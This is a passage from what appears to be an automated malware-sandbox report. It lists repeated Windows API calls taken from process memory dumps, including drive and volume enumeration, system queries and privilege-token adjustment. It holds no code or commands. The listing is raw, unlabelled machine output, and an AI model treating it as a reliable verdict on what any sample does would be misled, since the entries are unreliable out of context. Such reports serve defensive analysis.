                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CAB0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 02840819
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0284072D
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 028408E5
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CAA94A
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02840DD6
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CABDBC
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CAB0AE
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CAAB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01CABB2F
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 01CAAFBE
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 028408E5
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CABA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01CAA39C
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01CAAB1A
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: LookupPrivilegeValue
                                                    • String ID:
                                                    • API String ID: 3899507212-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01CAAA71
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6E715BAC,00000000,00000000,00000000,00000000), ref: 02840819
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01CAABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?,?), ref: 01CABA7E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 028401D0
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0284109E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01CAA23E
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTextAttribute.KERNEL32(?,?), ref: 0284132F
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: AttributeConsoleText
                                                    • String ID:
                                                    • API String ID: 646522457-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01CABB2F
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02840502
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02840FB0
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01CAA94A
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • UnmapViewOfFile.KERNELBASE(?), ref: 02840640
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: FileUnmapView
                                                    • String ID:
                                                    • API String ID: 2564024751-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetLogicalDrives.KERNELBASE ref: 01CAABC9
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: DrivesLogical
                                                    • String ID:
                                                    • API String ID: 999431828-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadUILanguage.KERNEL32(?), ref: 02841148
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguageThread
                                                    • String ID:
                                                    • API String ID: 243849632-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetSystemInfo.KERNELBASE(?), ref: 0284099C
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2136975024.0000000002840000.00000040.00000001.sdmp, Offset: 02840000, based on PE: false
                                                    Similarity
                                                    • API ID: InfoSystem
                                                    • String ID:
                                                    • API String ID: 31276548-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetErrorMode.KERNELBASE(?), ref: 01CAA39C
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ErrorMode
                                                    • String ID:
                                                    • API String ID: 2340568224-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleOutputCP.KERNEL32 ref: 01CAAA71
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleOutput
                                                    • String ID:
                                                    • API String ID: 3985236979-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01CAA9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CloseHandle.KERNELBASE(?), ref: 01CAA9C8
                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132769982.0000000001CAA000.00000040.00000001.sdmp, Offset: 01CAA000, based on PE: false
                                                    Similarity
                                                    • API ID: CloseHandle
                                                    • String ID:
                                                    • API String ID: 2962429428-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2137432029.00000000029F0000.00000040.00000040.sdmp, Offset: 02930000, based on PE: true
                                                    • Associated: 0000000F.00000002.2137034492.0000000002930000.00000008.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2145170499.0000000005710000.00000040.00000001.sdmp, Offset: 05710000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2137432029.00000000029F0000.00000040.00000040.sdmp, Offset: 02930000, based on PE: true
                                                    • Associated: 0000000F.00000002.2137034492.0000000002930000.00000008.00000001.sdmp
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132757247.0000000001CA2000.00000040.00000001.sdmp, Offset: 01CA2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Memory Dump Source
                                                    • Source File: 0000000F.00000002.2132757247.0000000001CA2000.00000040.00000001.sdmp, Offset: 01CA2000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Non-executed Functions

                                                    Executed Functions

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01B8AD37
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 01B8AD37
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: AdjustPrivilegesToken
                                                    • String ID:
                                                    • API String ID: 2874748243-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01B8B329
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • NtQuerySystemInformation.NTDLL(?,?,?,?), ref: 01B8B329
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationQuerySystem
                                                    • String ID:
                                                    • API String ID: 3562636166-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleTitleW.KERNEL32(?), ref: 022101D0
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleTitle
                                                    • String ID:
                                                    • API String ID: 3358957663-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0221072D
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02210DD6
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32EnumProcessModules.KERNEL32(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8AFBE
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: EnumModulesProcess
                                                    • String ID:
                                                    • API String ID: 1082081703-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetVolumeInformationW.KERNELBASE(?,00000E9C,?,?), ref: 0221109E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationVolume
                                                    • String ID:
                                                    • API String ID: 2039140958-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetConsoleCtrlHandler.KERNEL32(?,00000E9C,?,?), ref: 01B8A23E
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleCtrlHandler
                                                    • String ID:
                                                    • API String ID: 1513847179-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetFileType.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 02210819
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SHGetFolderPathW.SHELL32(?,00000E9C,?,?), ref: 02210502
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FolderPath
                                                    • String ID:
                                                    • API String ID: 1514166925-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 0221072D
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateFile
                                                    • String ID:
                                                    • API String ID: 823142352-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • ReadFile.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 022108E5
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: FileRead
                                                    • String ID:
                                                    • API String ID: 2738559852-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • SetThreadPreferredUILanguages.KERNEL32(?,00000E9C,?,?), ref: 01B8A94A
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: LanguagesPreferredThread
                                                    • String ID:
                                                    • API String ID: 842807343-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • RegisterEventSourceW.ADVAPI32(?), ref: 02210DD6
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: EventRegisterSource
                                                    • String ID:
                                                    • API String ID: 1693822063-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetTokenInformation.KERNELBASE(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8BDBC
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationToken
                                                    • String ID:
                                                    • API String ID: 4114910276-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetDriveTypeW.KERNELBASE(?), ref: 02210FB0
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: DriveType
                                                    • String ID:
                                                    • API String ID: 338552980-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2135681430.0000000002210000.00000040.00000001.sdmp, Offset: 02210000, based on PE: false
                                                    Similarity
                                                    • API ID: ConsoleWrite
                                                    • String ID:
                                                    • API String ID: 2657657451-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • K32GetModuleInformation.KERNEL32(?,00000E9C,6EDED775,00000000,00000000,00000000,00000000), ref: 01B8B0AE
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: InformationModule
                                                    • String ID:
                                                    • API String ID: 3425974696-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetConsoleScreenBufferInfo.KERNEL32 ref: 01B8BB2F
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
                                                    • API ID: BufferConsoleInfoScreen
                                                    • String ID:
                                                    • API String ID: 3437242342-0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • LookupPrivilegeValueW.ADVAPI32(?,?,?), ref: 01B8AB1A
                                                    Memory Dump Source
                                                    • Source File: 00000011.00000002.2133785597.0000000001B8A000.00000040.00000001.sdmp, Offset: 01B8A000, based on PE: false
                                                    Similarity
